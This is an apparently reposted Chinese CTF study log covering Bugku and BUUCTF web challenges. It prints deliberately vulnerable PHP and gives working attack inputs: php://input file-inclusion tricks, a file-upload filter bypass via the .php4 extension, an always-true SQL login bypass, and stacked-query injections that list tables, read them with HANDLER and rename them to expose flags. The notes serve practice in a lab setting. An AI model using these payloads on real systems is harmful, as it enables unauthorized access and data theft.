2021-06-15

213 阅读 0 评论 141 点赞

我是靠谱客的博主傲娇萝莉，最近开发中收集的这篇文章主要介绍2021-06-15，觉得挺不错的，现在分享给大家，希望可以做个参考。

概述

2021/6/15
bugku
web30

<?php
extract($_GET);
if (!empty($ac))
{
$f = trim(file_get_contents($fn));//将fn的内容读入$f
if ($ac === $f)
{
echo "<p>This is flag:" ." $flag</p>";
}
else
{
echo "<p>sorry!</p>";
}
}
?>

file_get_contents — 将整个文件读入一个字符串
php://input执行POST数据中的php代码
php://filter读取源代码并进行base64编码输出
题目要求ac和f相等而f的内容是从fn来的，由此想到用php://input来将fn中写入内容与ac相同的内容即可在这里插入图片描述

bugku
需要管理员
后台扫描处robots.txt进入查看发现resusl.php进入发现x需要与password相等，然后经过评论提示是弱口令猜测admin即可

bugku
文件上传
经过提示知道有三个过滤
请求头部的 Content-Type——改大小写，暂时不知原因挖坑先
文件后缀——php4可以绕过
请求数据的Content-Type——图片的格式

bugku
文件包含2（这题不怎么明白就先挖坑）
打开页面查看源代码发现注释

[极客大挑战 2019]EasySQL
开始界面是要登录注册，然后题目说是sql注入，往sql方向去想
我们试着加在用户名或密码处加一个单引号，点击登录后我们发现报错了
在报错信息中我们可以看到是字符类的注入，
看到网上说的有一个万能密码
我们可以通过“万能密码”来直接登录进去
?username=admin’or’1’=‘1&password=admin’or’1’=‘1
这样我们的账号密码不对（or前面），就会执行or后面的’1’='1’这是一个恒真的，我们使用错误的账号密码来达到了登录成功的目的。

2021/6/18
buu
[极客大挑战 2019]Havefun
打开页面只有一只猫然后看源码找到一段注释

<!--
        $cat=$_GET['cat'];
        echo $cat;
        if($cat=='dog'){
            echo 'Syc{cat_cat_cat_cat}';
        }
        -->

get传参cat=dog即可

1’; show databases;#爆库名
在这里插入图片描述
1’; show tables;#爆表名

在这里插入图片描述
1’; show columns from 1919810931114514;#查寻1919810931114514中的内容

ps (1919810931114514要用反单引号括起来)而查询tables中的内容时不需要
网上给出的解释是
注意：在windows系统下，反单引号（）是数据库、表、索引、列和别名用的引用符 eg. mysql> SELECT * FROMtableWHEREid` = ‘123’ ;
1919810931114514必须用反单引号括起来，但是words不需要，应该是和数据类型有关

网上找的查看flag方法
1’; handler 1919810931114514 open;handler 1919810931114514read first;#
在这里插入图片描述
至于为什么这样能看见flag还在研究
还有一种网上常见方法是改名字，猜测所有的内容都在words表中，将words改为其它的名字
1919810931114514改为words，flag名字改为id，然后查询

0’;rename table words to words1;rename table 1919810931114514 to
words;alter table words change flag id varchar(100) CHARACTER SET utf8
COLLATE utf8_general_ci NOT NULL;desc words;#
结合上面的1’ or 1=1#爆出表所有内容就可以查flag啦

[SUCTF 2019]EasySQL
经过多方查询后发现这题依然是堆叠注入
1; show databases;#爆库名
在这里插入图片描述
1；show tables;#继续查表
后边发现也是不给看flag表里的内容
网上找到了一些解题的方法
没理解。。。。。